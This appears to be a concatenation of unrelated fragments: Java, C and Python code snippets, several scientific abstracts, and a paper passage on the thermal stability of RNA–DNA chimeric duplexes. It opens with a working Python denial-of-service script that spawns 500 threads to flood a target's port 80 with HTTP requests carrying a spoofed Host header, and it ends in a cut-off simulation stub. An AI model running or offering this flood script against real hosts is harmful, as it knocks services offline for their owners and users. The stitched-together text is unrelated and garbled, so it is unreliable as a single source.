import threading import socket import time target= "target ip" port=80 fake_ip="172.16.31.10" def dos(): while True: stream=socket.socket(socket.AF_INET,socket.SOCK_STREAM) stream.connect((target,port)) stream.sendto((f"GET /{target} HTTP/1.1\r\n").encode("ascii"),(target,port)) stream.sendto((f"Host: {fake_ip}\r\n\r\n").encode('ascii'),(target,port)) stream.close() for i in range(500): thread=threading.Thread(target=dos) time.sleep(4) thread.start()
/**
 * Helps with setting a list. Tries to deal with nulls and throws a
 * more helpful exception than the otherwise thrown
 * {@link IndexOutOfBoundsException}.
 *
 * @author rob
 */
public class ListSetterHelper<E> {

    private final List<E> elements;

    public ListSetterHelper() {
        this(new LinkedList<>());
    }

    public ListSetterHelper(List<E> list) {
        this.elements = list;
    }

    public void set(int index, E element) {
        if (index < elements.size()) {
            if (element == null) {
                elements.remove(index);
            } else {
                elements.set(index, element);
            }
        } else if (index == elements.size()) {
            elements.add(element);
        } else {
            throw new IllegalArgumentException("Index " + index +
                    " would leave gaps which isn't allowed.");
        }
    }

    public List<E> getList() {
        return this.elements;
    }
}
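The gap-free set semantics above (replace within bounds, remove on null, append only at the next free index, reject anything beyond it) can be sketched compactly. This is an illustrative Python translation of the same three branches, not part of the original class:

```python
def gapless_set(lst, index, element):
    """Set lst[index] without ever leaving gaps.

    None removes the element, index == len(lst) appends,
    and any larger index is rejected up front.
    """
    if index < len(lst):
        if element is None:
            lst.pop(index)
        else:
            lst[index] = element
    elif index == len(lst):
        lst.append(element)
    else:
        raise ValueError(f"Index {index} would leave gaps which isn't allowed.")
```

As in the Java helper, the error is raised before the list is touched, so a bad index never corrupts the list.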
Reverse banding on chromosomes produced by a guanosine-cytosine specific DNA binding antibiotic: olivomycin. Characteristic reverse fluorescent banding patterns (R bands) on human, bovine, and mouse metaphase chromosomes are produced by treating chromosome preparations directly with olivomycin. With the DNA in solution, olivomycin fluorescence was compared against synthetic repeating polymers, including the A-T polymer poly d(A-T)·poly d(A-T) (where A is adenine and T is thymine). Calf thymus DNA, with an intermediate G-C content of about 40 percent, showed a smaller fluorescence enhancement in the presence of olivomycin than was observed for the G-C-rich synthetic polynucleotide. The closely related antibiotic chromomycin A3 showed the same results as were obtained with olivomycin, both in the solution interactions with specific DNA's and with the metaphase chromosome preparations. The production of R bands by these G-C-specific DNA binding antibiotics lends credence to the suggestion that the arrangement of the nucleotide sequences along the chromosome is a primary determinant of the appearance of fluorescent bands.
Effect of injection-molding-induced residual stress on microchannel deformation irregularity during thermal bonding. Micro injection molding offers a promising approach for rapidly producing thermoplastic microfluidic substrates in large volumes. Much research has focused on the replication fidelity of microstructures in injection molding, but the effect of molded-in residual stress on microchannel deformation during the subsequent thermal bonding process has not been investigated. These effects could be important because the residual stress that develops from anisotropic polymer flow orientation and inhomogeneous cooling may lead to abnormal microchannel distortion. In the direct thermal bonding process, asymmetric cross-sectional distortion was observed in well-formed microchannels aligned perpendicular to the polymer melt injection direction. This asymmetric distortion is attributed to the residual stress introduced into the substrates during molding, particularly in the surface region where the microchannels are molded. A design-of-experiments study on injection molding was carried out to reduce the residual stress and thereby achieve the lowest microchannel deformation irregularity, a new term defined in this study. Direct thermal bonding was utilized as a feasible, non-destructive, indirect quantitative method to evaluate the effect of residual stress around the microchannels on deformation irregularity. The dominant molding parameters with positive effects were found to be melt temperature, mold temperature, and cooling time after packing. The presence of the residual stress was also demonstrated through photoelastic stress analysis in terms of phase retardation. With improved molding conditions, the absolute retardation difference around microchannels aligned parallel and perpendicular to the molding direction could be tuned to the same level, indicating that the molded-in residual stresses had been moderated.
/**
 * Ticks the flux handler.
 * Should be called every tick.
 */
@Override
public void tick(){
    World world = owner.getLevel();
    if(world.isClientSide()){
        if(rendered.length != 0 && world.getGameTime() % FluxUtil.FLUX_TIME == 0 && CRConfig.fluxSounds.get()){
            CRSounds.playSoundClientLocal(world, owner.getBlockPos(), CRSounds.FLUX_TRANSFER, SoundCategory.BLOCKS, 0.4F, 1F);
        }
        return;
    }

    long worldTime = world.getGameTime();
    if(worldTime != lastTick){
        lastTick = worldTime;
        if(lastTick % FluxUtil.FLUX_TIME == 0){
            int toTransfer = flux;
            readingFlux = flux;
            flux = queuedFlux;
            queuedFlux = 0;
            if(fluxTransferHandler == null){
                Pair<Integer, int[]> transferResult = FluxUtil.performTransfer(this, linkHelper.getLinksRelative(), toTransfer);
                flux += transferResult.getLeft();
                if(!Arrays.equals(transferResult.getRight(), rendered)){
                    rendered = transferResult.getRight();
                    CRPackets.sendPacketAround(world, owner.getBlockPos(), new SendIntArrayToClient(RENDER_ID, rendered, owner.getBlockPos()));
                }
            }else{
                fluxTransferHandler.accept(toTransfer);
            }
            owner.setChanged();
            shutDown = FluxUtil.checkFluxOverload(this);
        }
    }
}
A Lifetime Performance Analysis of LED Luminaires Under Real-Operation Profiles. Light-emitting diode (LED)-based lighting is the dominant lighting solution of the current era because it is energy-efficient and long-lasting; performance analysis of LEDs throughout their lifetime is therefore of prime importance. The work presented in this article provides insight into degradation of an LED luminaire, inclusive of the LED driver, under real operating ambient conditions, and investigates the performance of both the LED light engine and the LED driver over the luminaire's lifetime. To represent the practical usage of LED lighting systems in commercial applications, the effect of switching cycles on the performance of LED luminaires is also studied. The outcome of this article suggests that the LED luminaire under study tends to fail first by lumen degradation, followed by color shift (represented by Duv), and lastly by driver failure. Scanning electron microscopy and energy-dispersive spectroscopy (SEM-EDS) analysis points to corrosion of the Ag mirror as the cause of the lumen output reduction and thus the main reason for failure of the LED luminaire. This gives LED manufacturing companies a better basis for estimating the lifetime of LED luminaires and highlights the need to improve LED performance so that luminaires achieve the longer lifetimes claimed.
Characterization and biocompatibility of epoxy-crosslinked dermal sheep collagens. Dermal sheep collagen (DSC), crosslinked with 1,4-butanediol diglycidyl ether (BD) under four different conditions, was characterized, and its biocompatibility was evaluated after subcutaneous implantation in rats. Crosslinking at pH 9.0 (BD90) or with successive epoxy and carbodiimide steps (BD45EN) resulted in a large increase in the shrinkage temperature (T(s)) in combination with a clear reduction in amines. Crosslinking at pH 4.5 (BD45) increased the T(s) of the material but hardly reduced the number of amines. Acylation (BD45HAc) showed the largest reduction in amines in combination with the lowest T(s). An evaluation of the implants showed that BD45, BD90, and BD45EN were biocompatible. A high influx of polymorphonuclear cells and macrophages was observed for BD45HAc, but this subsided by day 5. At week 6 the BD45 had completely degraded and BD45HAc was remarkably reduced in size, while BD45EN showed a clear size reduction of the outer DSC bundles; BD90 showed none of these features. This agreed with the observed degree of macrophage accumulation and giant cell formation. None of the materials calcified. For the purpose of soft tissue replacement, BD90 was defined as the material of choice because it combined biocompatibility, low cellular ingrowth, low biodegradation, and the absence of calcification with fibroblast ingrowth and new collagen formation.
/*
 * Writes to the log and updates the cursor and committed index.
 * Abstracts away ledgers and handles - it operates at the log abstraction level.
 * A single log writer instance only ever writes to a single ledger.
 * When an event occurs such as the ledger having been closed, fenced,
 * or there not being enough bookies to write, the writer aborts.
 */
public class LogWriter extends LogClient {

    private Logger logger = LogManager.getLogger(this.getClass().getSimpleName());
    private LedgerWriteHandle writeHandle;
    private Versioned<List<Long>> cachedLedgerList;

    public LogWriter(ManagerBuilder managerBuilder,
                     MessageSender messageSender,
                     BiConsumer<Position, Op> cursorUpdater) {
        super(managerBuilder, messageSender, cursorUpdater);
        this.cachedLedgerList = new Versioned<>(new ArrayList<>(), -1);
    }

    public CompletableFuture<Void> start(Versioned<List<Long>> cachedLedgerList) {
        this.cachedLedgerList = cachedLedgerList;
        return createWritableLedgerHandle()
                .thenApply(this::checkForCancellation)
                .thenAccept((Void v) -> {
                    Position p = new Position(writeHandle.getLedgerId(), -1L);
                    cursorUpdater.accept(p, null);
                });
    }

    @Override
    public void cancel() {
        isCancelled.set(true);
        if (writeHandle != null) {
            writeHandle.cancel();
        }
    }

    public boolean isHealthy() {
        return writeHandle.getCachedLedgerMetadata().getValue().getStatus().equals(LedgerStatus.OPEN);
    }

    public Versioned<List<Long>> getCachedLedgerList() {
        return cachedLedgerList;
    }

    public void printState() {
        logger.logInfo("-------------- Log Writer state -------------");
        if (writeHandle == null) {
            logger.logInfo("No ledger handle");
        } else {
            writeHandle.printState();
        }
        logger.logInfo("---------------------------------------------");
    }

    public CompletableFuture<Void> close() {
        CompletableFuture<Void> future = new CompletableFuture<>();
        writeHandle.close()
                .whenComplete((Versioned<LedgerMetadata> vlm, Throwable t) -> {
                    if (isError(t)) {
                        future.completeExceptionally(t);
                    } else {
                        future.complete(null);
                    }
                });
        return future;
    }

    public CompletableFuture<Void> write(String value) {
        return writeHandle.addEntry(value)
                .thenApply(this::checkForCancellation)
                .thenAccept((Entry entry) -> {
                    Op op = Op.stringToOp(entry.getValue());
                    Position pos = new Position(entry.getLedgerId(), entry.getEntryId());
                    cursorUpdater.accept(pos, op);
                });
    }

    private CompletableFuture<Void> createWritableLedgerHandle() {
        CompletableFuture<Void> future = new CompletableFuture<>();
        ledgerManager.getAvailableBookies()
                .thenApply(this::checkForCancellation)
                .thenCompose((List<String> availableBookies) -> createLedgerMetadata(availableBookies))
                .thenApply(this::checkForCancellation)
                .thenCompose((Versioned<LedgerMetadata> vlm) -> appendToLedgerList(vlm))
                .thenApply(this::checkForCancellation)
                .whenComplete((Versioned<LedgerMetadata> vlm, Throwable t) -> {
                    if (t == null) {
                        writeHandle = new LedgerWriteHandle(ledgerManager, messageSender, vlm);
                        logger.logDebug("Created new ledger handle for writer");
                        writeHandle.printState();
                        future.complete(null);
                    } else if (isError(t)) {
                        future.completeExceptionally(t);
                    } else {
                        future.complete(null);
                    }
                });
        return future;
    }

    private CompletableFuture<Versioned<LedgerMetadata>> createLedgerMetadata(List<String> availableBookies) {
        if (availableBookies.size() < Constants.Bookie.WriteQuorum) {
            return Futures.failedFuture(
                    new BkException("Not enough non-faulty bookies", ReturnCodes.Bookie.NOT_ENOUGH_BOOKIES));
        } else {
            return ledgerManager.getLedgerId()
                    .thenApply(this::checkForCancellation)
                    .thenCompose((Long ledgerId) -> {
                        List<String> ensemble = randomSubset(availableBookies, Constants.Bookie.WriteQuorum);
                        LedgerMetadata lmd = new LedgerMetadata(ledgerId, Constants.Bookie.WriteQuorum,
                                Constants.Bookie.AckQuorum, ensemble);
                        logger.logDebug("Sending create ledger metadata request: " + lmd);
                        return ledgerManager.createLedgerMetadata(lmd);
                    });
        }
    }

    private CompletableFuture<Versioned<LedgerMetadata>> appendToLedgerList(Versioned<LedgerMetadata> ledgerMetadata) {
        CompletableFuture<Versioned<LedgerMetadata>> future = new CompletableFuture<>();
        cachedLedgerList.getValue().add(ledgerMetadata.getValue().getLedgerId());
        metadataManager.updateLedgerList(cachedLedgerList)
                .thenAccept((Versioned<List<Long>> vll) -> {
                    logger.logDebug("Appended ledger to list: " + vll.getValue());
                    cachedLedgerList = vll;
                    future.complete(ledgerMetadata);
                })
                .whenComplete((Void v, Throwable t) -> {
                    if (t != null) {
                        future.completeExceptionally(t);
                    }
                });
        return future;
    }

    private List<String> randomSubset(List<String> bookies, int subsetSize) {
        List<String> copy = new ArrayList<>(bookies);
        Collections.shuffle(copy);
        return copy.stream().limit(subsetSize)
                .sorted()
                .collect(Collectors.toList());
    }
}
/**
 * Draw game over screen
 *
 * @param graphic The instance of Graphics class
 */
private void drawGameOver(Graphics graphic) {
    LOGGER.finer("Drawing game over");

    String gameOverMsg = "Game over!";
    String playAgainMsg = "Click and hold anywhere to play again";
    String scoreMsg = lastScore.toString();

    graphic.setColor(Color.WHITE);
    graphic.setFont(fontManager.getBigFont());
    graphic.drawString(scoreMsg,
            (windowWidth - fontManager.getBigMetrics().stringWidth(scoreMsg)) / 2,
            windowHeight / 2 - 50);

    graphic.setColor(Color.WHITE);
    graphic.setFont(fontManager.getMediumFont());
    graphic.drawString(gameOverMsg,
            (windowWidth - fontManager.getMediumMetrics().stringWidth(gameOverMsg)) / 2,
            windowHeight / 2);

    graphic.setColor(new Color(201, 16, 52));
    graphic.setFont(fontManager.getSmallFont());
    graphic.drawString(playAgainMsg,
            (windowWidth - fontManager.getSmallMetrics().stringWidth(playAgainMsg)) / 2,
            (windowHeight / 2) + 50);
}
def _get_object(name: str) -> Optional[base.Trackable]:
  module = TFGraphContext.get_module_to_export()
  if module is None:
    raise RuntimeError(
        f'No module found to track {name} with. Check that the '
        '`preprocessing_fn` is invoked within a `TFGraphContext` with a valid '
        '`TFGraphContext.module_to_export`.')
  return getattr(module, name, None)
// From LuisAlvarez98/VirtualMemorySimulator
#ifndef Files_h
#define Files_h

#include <string>
#include <fstream>

using namespace std;

class Files {
public:
    Files() {}

    // Tries to open a file; fails if it cannot be opened or is empty
    bool tryOpen(string filename, ifstream &file) {
        file.open(filename);
        if (!file.is_open()) {
            return false;
        }
        if (file.peek() == ifstream::traits_type::eof()) {
            // the file is empty
            return false;
        }
        return true;
    }

    // Reads the file's data and stores it as it goes
};

#endif
#include "TextBox.h"
#include "InputComponent.h"
#include "Engine.h"
#include "SpriteComponent.h"

TextBox::TextBox(float x, float y, const char* name, const char* path) : Actor(x, y, name)
{
    m_spriteComponent = dynamic_cast<SpriteComponent*>(addComponent(new SpriteComponent(path)));
}

void TextBox::start()
{
    m_inputComponent = dynamic_cast<InputComponent*>(addComponent(new InputComponent()));
}

void TextBox::update(float deltaTime)
{
    // Use the inputs to allow the player to start the game or quit the game.
    if (m_inputComponent->get1KeyPressed())
        Engine::setCurrentScene(1);

    if (m_inputComponent->get2KeyPressed())
        Engine::CloseApplication();
}
/* Convert the start_indices/end_indices into a string slice */
void nccf_make_slice( int ndims, int bind[], int eind[], char *slice ){

  char *iBegStr, *iEndStr;
  char range[STRING_SIZE];
  int i;

  strcpy( slice, "" );
  iBegStr = (char*)calloc( STRING_SIZE, sizeof(char) );
  iEndStr = (char*)calloc( STRING_SIZE, sizeof(char) );

  for (i = 0; i < ndims; ++i) {
    /* Build one "begin<range sep>end" pair per dimension */
    sprintf(iBegStr, "%d", bind[i]);
    sprintf(iEndStr, "%d", eind[i]);
    strcpy(range, iBegStr);
    strcat(range, CF_RANGE_SEPARATOR);
    strcat(range, iEndStr);
    if (i < ndims - 1) {
      strcat(range, CF_INDEX_SEPARATOR);
    }
    strcat(slice, range);
  }

  free( iBegStr );
  free( iEndStr );
}
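The same begin/end-to-slice-string construction can be expressed compactly. Below is a hypothetical Python equivalent, assuming the range and index separators are ":" and "," (the actual `CF_RANGE_SEPARATOR`/`CF_INDEX_SEPARATOR` values are defined elsewhere in the library):

```python
def make_slice(bind, eind, range_sep=":", index_sep=","):
    """Join one 'begin:end' pair per dimension, separated by commas."""
    return index_sep.join(f"{b}{range_sep}{e}" for b, e in zip(bind, eind))
```

For example, `make_slice([0, 5], [10, 20])` yields `"0:10,5:20"`, matching the C function's output shape without manual buffer management.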
/**
 * Test the text of the response message
 */
@Test
public void testMessage() {
    ResponseMessage message = new ResponseMessage();
    message.setText("TEXT");
    assertEquals("TEXT", message.getText());
}
def testResults(self):
    self.ips_obj = iperf.IperfSet(self.fake_host_src, self.fake_host_dst,
                                  IperfSetTest.dst)
    self.ips_obj.Start(length=10)
    self.ips_obj.Stop()
    results = self.ips_obj.Results()
    self.assertEqual(len(results), 2)
    self.assertEqual(len(results[0]), len(self.fake_host_dst))
    self.assertEqual(len(results[1]), len(self.fake_host_src))
    for i in range(len(self.fake_host_dst)):
        self.assertIn('Server listening', results[0][i])
    for i in range(len(self.fake_host_src)):
        self.assertIn('Client connecting', results[1][i])
package spring.project.common.model;

public enum PlayerState {
    DEFINING, BEGINNING, PLAYING, ENDING;
}
/*
 * Write a code to the output stream.
 */
inline void G3Encoder::putcode(const tableentry& te)
{
    putBits(te.code, te.length);
}
The RNA world hypothesis1-3 postulates that RNA played the role of DNA (genotype) and proteins (phenotype) and gave rise later to an RNA/DNA/Protein world, implying that proteins and DNA were the inventions of an RNA world (Scheme 1 a).4-7 This hypothesis is largely based on the analysis of extant biochemical machinery and the fact that deoxyribonucleotides are formed by the enzyme-catalyzed reduction of ribonucleotides.8-10 However, this is countered by the arguments that DNA arose earlier, or concurrently with RNA, supported by plausible prebiotic routes to deoxyribonucleosides or their precursors.11-17 That RNA led to DNA, or vice versa, or that the two could have coexisted before the sophisticated biochemical machinery came into existence, raises the question of how one homogeneous backbone system (RNA) gave rise to another homogeneous backbone (DNA) in a protobiological (and/or prebiological) world17-19 without encountering heterogeneous backbones (Scheme 1 b). In extant biology, there are instances of RNA–DNA heterogeneity in nuclear DNA due to the misincorporation of rNMP by DNA polymerase.20-22 Moreover, some RNA polymerases and their mutants are shown to accept dNMPs and tolerate sugar heterogeneity sites in DNA-, RNA- or hybrid template-mediated replication.23-26 It has been suggested that these observations imply that backbone heterogeneity was part of the evolutionary process, still manifested in extant biology.23 In current biology, misincorporation of rNMP in DNA and of dNMP in RNA is carefully guarded against by evolved repair, editing and proof-reading enzymes.27, 28 Absent alternative mechanisms (primitive catalysts or compartments) able to distinguish between the nucleotides of DNA and RNA and/or keep them spatially separated, oligomeric sequences containing random mixtures of RNA and DNA residues would have been inevitable.14-19 Scheme 1 The RNA world concept.
a) Transition from a homogeneous RNA backbone to a homogeneous DNA backbone is assumed during the invention of DNA by RNA, b) without consideration of the role of the heterogeneous backbone chimeric sequences that would be formed. From previous studies of homogeneous backbone sequences, the thermal stability of hybrid duplexes follows the general trend RNA–RNA > RNA–DNA > DNA–DNA (or DNA–DNA > DNA–RNA) depending on the sequence context.29-33 Based on such studies and others involving homogeneous backbones of XNAs, there is an implicit assumption in the RNA world approach that mixed RNA–DNA polymers containing monomers of each type could still engage in base-pair mediated replication and tolerate chemical heterogeneity.18 Whether this enables a smooth transfer of information going from a homogeneous RNA backbone to a homogeneous DNA backbone, via "heterogeneous backbone" systems, was the motivation for this study (Scheme 2 b). Since Watson–Crick base-pair mediated interactions are at the heart of RNA-to-DNA information transfer and fidelity (via template-mediated replication), the base-pairing behavior of heterogeneous backbone chimeric sequences of RNA and DNA was investigated and compared to the parent RNA and DNA sequences. Four sets of sequences, self-complementary and non-self-complementary A–T/u 16-mer, non-self-complementary A–T/u–G–C 10-mer, and self-complementary C–G 6-mer, were chosen as representative systems (lower case indicates ribonucleotide) (Figure 1). In order to constrain the space of possible combinations, a set of heterogeneous backbone chimeric sequences representative of transitioning from RNA to DNA was generated by systematically changing a) RNA-pyrimidine (r-Py) to DNA-pyrimidine (d-Py) and b) RNA-purine (r-Pu) to DNA-purine (d-Pu). This led to 8, 32 and 16 (r/d)Pu–(r/d)Py duplex combinations for the first 3 sets of sequences. The smaller number of nucleotides in the C–G 6-mer sequences allowed investigation of more diverse backbone patterns.
We measured the base-pairing propensity of all sequences via UV-T m thermal melts and, for selected sequences, the temperature-dependent CD spectra to gain insight into how some of these chimeric duplexes compare with their unmodified parent duplexes in overall helical structure. Figure 1 Charts displaying base-pairing stability relative to RNA (ΔT m (°C)) for each duplex (blue bars) and for the average of a given RNA:DNA ratio (orange line and dots). a) self-complementary A–T/u, b) non-self-complementary A–T/u, c) non-self-complementary A–T/u–G–C and d) self-complementary C–G sequences. a, u, c, g represent RNA and A, T, C, G represent DNA. For conditions of measurements and T m values see the Supporting Information (Tables S1–S5). The thermal melt studies of the self-complementary A–T/u system, 5′-(au) 8 -3′ to 5′-(AT) 8 -3′, indicated that the homogeneous backbone combinations were the most stable duplexes (Figure 2 a). The heterogeneous backbone chimeric duplexes had significantly reduced thermal stabilities compared to the homogeneous parent DNA or RNA duplexes (Figure S1 and Table S1 in the Supporting Information). There was little variance due to the directionality of either nucleobase or backbone sequences (e.g. 5′-(Pu-Py) n -3′ vs. 5′-(Py-Pu) n -3′ and 5′-(ribose-deoxyribose) n -3′ vs. 5′-(deoxyribose-ribose) n -3′) in these destabilized duplexes (Figure 2 a). The detrimental impact of backbone heterogeneity on base-pairing stability in this simple duplex system was significant, much more than expected from previous studies.29-31 The non-self-complementary system 5′-a 4 u 3 auau 2 au 2 a-3′+3′-u 4 a 3 uaua 2 ua 2 u-5′ provided the possibility of varying the ratios of RNA:DNA nucleotides within a duplex and the opportunity to study non-symmetric chimeric backbone sequences (Figure 2 b and Figures S2, S3).
Similar to the self-complementary system, duplexes with homogeneous ribose and deoxyribose backbones had the highest thermal stabilities (Figure 2 b, Table S2). The heterogeneous backbone chimeric systems formed a pool of relatively destabilized duplexes. Simulating the transition from the full RNA duplex to the fully mixed duplexes via "modification" of ribose to deoxyribose consistently led to decreases in duplex stability. The first round of modification, to either of the two strands, leading to the 75 %/25 % RNA/DNA duplexes, was generally disruptive, giving T m values 3–14 °C lower than the 100 % RNA duplex. Further modification to duplexes in which both strands were heterogeneous caused further reduction in duplex thermal stability (Figures S2, S3, Table S2). Similarly, continued infiltration of rNMP into DNA to form the 25 %/75 % RNA/DNA duplexes, irrespective of whether pyrimidine or purine residues were replaced, decreased duplex stability. Further incorporation of rNMP into DNA led to varying decreases in duplex stability depending on whether it was a purine or a pyrimidine residue. In general terms, the thermal stability lost in the transition from RNA (or DNA) to the 50 %/50 % RNA/DNA chimeras is about −1 °C per modification. The same was true for the reverse combination 5′-u 4 a 3 uaua 2 ua 2 u-3′+3′-a 4 u 3 auau 2 au 2 a-5′ (Figures S4, S5, Table S3). There did not appear to be any discernible thermal stability trend due to inter-strand nucleotide backbone pairing patterns (e.g. d- with d- and r- with r- vs. d- with r- and r- with d-), nor for regular vs. irregular insertions within the chimeric duplexes (Tables S2, S3). In nearly all cases, the modification of ribopurines to deoxyribopurines was more disruptive to duplex thermal stability than similar modification of the pyrimidines.
The weakest base‐pairing for the fully chimeric duplex was when all of the ribopurines were modified to deoxyribopurines, while the strongest base‐pairing for the chimeric duplex was when all of the ribopurines were retained (Figures S7, S8), consistent with previous observations for the homogeneous backbone chimeric duplexes.32, 33 With the expectation that a stronger C–G base‐pair might mitigate the drastic weakening in thermal stability due to RNA–DNA backbone heterogeneity, we studied a 10‐mer duplex 5′‐cgau 3 agcg‐3′+3′‐gcua 3 ucgc‐5′ containing all four canonical nucleobases (Figure 2 c, Figures S9, S10). The duplexes were designed to have an equal number of C–G and A–T/u base pairs, and an equal number of pyrimidines and purines on each strand. This provided a series of intermediate chimeric duplexes with varying percentages of ribose or deoxyribose to span the landscape between the extremes of homogeneous RNA and DNA. In spite of the expanded nucleobase heterogeneity (A, T/u, G, C), the trends in thermal instability of chimeric duplexes paralleled the observations for the two‐base A–T/u chimeric sequences. Doping dNMP (or rNMP) into one strand reduced the duplex thermal stability (4–12 °C lower) relative to the homogeneous RNA (or DNA) duplex, with the magnitude depending on whether modifications occurred at the pyrimidine or purine sites (Table S4, Figure S11). Introducing C–G pairs into the chimeric duplexes appears to enhance the destabilizing effects of backbone heterogeneity on base‐pairing. The ΔT m /modification for RNA and DNA going to 50 %/50 % chimera were, on average −1.6 °C and −1.2 °C, respectively, indicating that modification of RNA causes more significant destabilization than what is gained back in duplex stabilization in modification from chimera to DNA in the A–T/u–G–C pairing system. 
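The ΔT m-per-modification figures above follow from standard two-state melting thermodynamics. For reference, a common van't Hoff form relating the melting temperature to the duplex formation enthalpy and entropy (written here for a non-self-complementary duplex at total strand concentration C_T) is:

```latex
\frac{1}{T_m} \;=\; \frac{R}{\Delta H^{\circ}}\,\ln\!\left(\frac{C_T}{4}\right) \;+\; \frac{\Delta S^{\circ}}{\Delta H^{\circ}},
\qquad
\Delta G^{\circ}_{298} \;=\; \Delta H^{\circ} \;-\; 298\,\Delta S^{\circ}
```

For self-complementary duplexes the concentration factor is C_T rather than C_T/4; the ΔΔG 298 values discussed in this study are differences of ΔG 298 for each chimera relative to the homogeneous RNA duplex.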
For the CG-only containing self-complementary sequences 5′-(cg) 3 -3′, the same trends were observed (Figure 2 d, Figure S12); the homogeneous backbone RNA and DNA sequences had the highest stabilities while the mixed backbone sequences experienced a deep drop (ca. −20 °C, Table S5). The CD spectra for all heterogeneous backbone A–T/u–G–C chimeric duplexes display features that fall in between those of the parent RNA and DNA spectra (Figure S13). The general line shapes and peak shifts of the theoretical and experimental spectra correlate well, further supporting the intermediate helical nature of the chimeras, similar to previous RNA–DNA chimeric systems.34, 35 A van't Hoff analysis was undertaken to assess the influence of backbone heterogeneity on the A–T/u–G–C base-pairing system in terms of thermodynamic stability.36 The thermodynamic contributions of each duplex as well as the change in free energy (ΔΔG 298 ) relative to homogeneous RNA were determined (Table S4, Figures S14–S16). These values show similar trends to those observed for the T m values: as the backbones tend towards heterogeneity (50 % RNA/50 % DNA) there is a steady increase in thermodynamic instability, pointing to the existence of a free-energy barrier in the energy landscape of the RNA-to-DNA transition (Figure 2). Within each duplex class (differing ratios of ribose to deoxyribose) the most favorable free energies (lowest ΔG 298 ) correspond to the duplexes with the greatest proportion of ribopurines. Additionally, the duplexes with the most favorable enthalpic component have higher amounts of ribopurine, whereas the most entropically favored duplexes tend to be richer in deoxyribopurines. Figure 2 Bar graph of relative free energies (ΔΔG) of chimeric A–T/u–G–C duplexes.
The transition of RNA to DNA encounters thermodynamically unstable intermediate heterogeneous chimeric duplexes which vary in their relative stability depending on the number of chimeric junctions and content of purine‐RNA (r‐Pu). For conditions of measurements see the Supporting Information. The thermal stability decreases consistently with accruing numbers of chimeric RNA–DNA junctions; however, for the same number of chimeric junctions, it also depends very much on which backbone unit carries the pyrimidine or purine nucleobase (Figures S7, S8 and S11). As the systems tend towards homogeneity in the backbone, both of these effects vanish and the thermal stabilities of the duplexes increase.29 The significant and surprising destabilization of the highly heterogeneous chimeric duplexes, while requiring an in‐depth structural analysis,37 seems to stem from the conflicting conformational tendencies of ribose (“structural conservatism of RNA” favoring the A‐form, restricted to a 3′‐endo sugar pucker) versus deoxyribose (“polymorphism of DNA” favoring the B‐form, preferring a 2′‐endo sugar pucker).38 This conflicting sugar heterogeneity within the same backbone sequence gives rise to divergent inter‐phosphate distances (5.9 Å in A‐type versus 7 Å in B‐type duplex), differing dislocation of helix axis (4.4 to 4.9 Å versus −0.2 to −1.8 Å), opposing base‐pair tilt (+10° to +20.2° versus −5.9° to −16.4°) and inconsistent rotation per residue (30° to 32.7° versus 36° to 45°).38 Such local effects when coupled with nucleobase heterogeneity alter the overall curvature of the duplex, making it difficult to adopt either of the favored forms, detrimentally impacting the base‐pairing symmetry of inter‐ and intra‐strand base‐stacking overlaps.33, 38, 39 The current study raises questions regarding the feasibility of a linear transition from a homogeneous RNA world to a RNA/DNA world (“genetic takeover”), given the potential for heterogeneous backbone sequences to be a part of 
this transition. Some of the heterogeneous sequences themselves could have played a constructive role; it has been proposed that weak base-pairing of polymer strands may have facilitated the strand separation necessary for replication.18 Depending on the percent incorporation of DNA, there could still be an A-form of the heterogeneous sequence that could be conducive to template-mediated oligomerization.40, 41 However, the increased destabilization of duplexes above a certain threshold of backbone heterogeneity may impede base-pair mediated higher-order structure and function, leading to "non-inheritable backbones".18 Chimeric RNA–DNA sequences have been shown to reduce aptamer activity 1000-fold when compared to the parent homogeneous RNA and DNA systems.18 Similar incorporation of 2′–5′ linkages in RNA has been shown to reduce or even abolish base-pairing42 and also to reduce aptamer activity43 when compared to homogeneous parent systems. Such heterogeneous-backbone-induced instability is also true of other systems, such as backbones with mixed chirality.44 All of these results indicate that a) homogeneous backbones form duplexes that are stable and form catalysts that are functionally superior when compared to the heterogeneous backbone systems, and b) a limited amount of heterogeneous backbones could have played a role in the emergence of homogeneous systems19, 43 through selective pressures that would have been present to move the system from an initially heterogeneous backbone to a homogeneous one.
Apart from base-pairing properties, resistance to hydrolytic degradation is another consideration for oligonucleotides.45 Base-paired duplexes and tertiary structures are known to be more stable to hydrolytic degradation than the corresponding single-strand oligonucleotides.46-48 The thermally stable duplexes (composed of homogeneous and limited chimeric sequences) would persist, while the heterogeneous single strands hydrolyze back to their monomeric constituents to be recycled by the non-enzymatic oligomerization process into oligomers of various compositions. This repetitive process could lead to a gradual stockpiling of the more stable homogeneous backbone (RNA and DNA) duplex systems due to the preferential hydrolysis of the (heterogeneous) single strands. While the rate of deoxyribonucleotide incorporation could be low (lesser nucleophilicity of the 3′-OH) compared to that of ribonucleotides (higher nucleophilicity of the 2′,3′-OH), thus limiting the heterogeneity of DNA in RNA, this is countered by the expected accumulation of DNA in a sequence from the higher rates of hydrolysis of RNA over DNA.11 The consistent trends observed in the four sets of RNA/DNA duplex systems open up the possibility that homogeneous backbone systems (RNA and DNA) may have been a natural outcome starting from a heterogeneous prebiotic scenario,14-16 a scenario that can be extended to the emergence of homochiral backbones as well.44, 49 Instead of starting from a homogeneous/chiral RNA world, there could have been a heterogeneous/chiral mixture of RNA and DNA that led to the accumulation of the thermally and thermodynamically more stable homochiral homogeneous RNA and DNA sequences/duplexes/structures capable of fulfilling the informational and catalytic roles50 necessary for Darwinian co-evolution (Scheme 2), avoiding the "prebiological necessity" for RNA to invent catalysts to give rise to DNA and the subsequent genetic takeover.14 Such a heterogeneous-to-homogeneous
scenario19, 45, 51 would imply a co‐formation, co‐existence and co‐evolution of RNA and DNA, likely to be aided by the presence of other classes of molecules such as proto‐peptides and proto‐lipids.52-54 Scheme 2: Heterogeneity‐to‐homogeneity model: homogeneous backbone RNA and DNA systems could accumulate and emerge from a heterogeneous pool of compounds and intermediates based on increasing thermal and thermodynamic duplex stability. The model can be extended to include other heterogeneity such as configuration (α, β), chirality (d, l) and other sugars (e.g. pentoses). In memory of James P. Ferris
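As a purely illustrative aside, the enrichment dynamic described here (stable duplexes persist while heterogeneous single strands hydrolyze and are recycled) can be sketched as a toy stochastic simulation; every probability below is invented for illustration and carries no chemical significance:

```python
import random

# Toy model of the heterogeneity-to-homogeneity scenario.
# All parameters are illustrative assumptions, not measured values.
P_DUPLEX_HOMO = 0.8       # homogeneous-backbone strands pair into stable duplexes
P_DUPLEX_HET = 0.2        # chimeric strands pair poorly
P_HYDROLYZE_SINGLE = 0.5  # unpaired single strands hydrolyze readily
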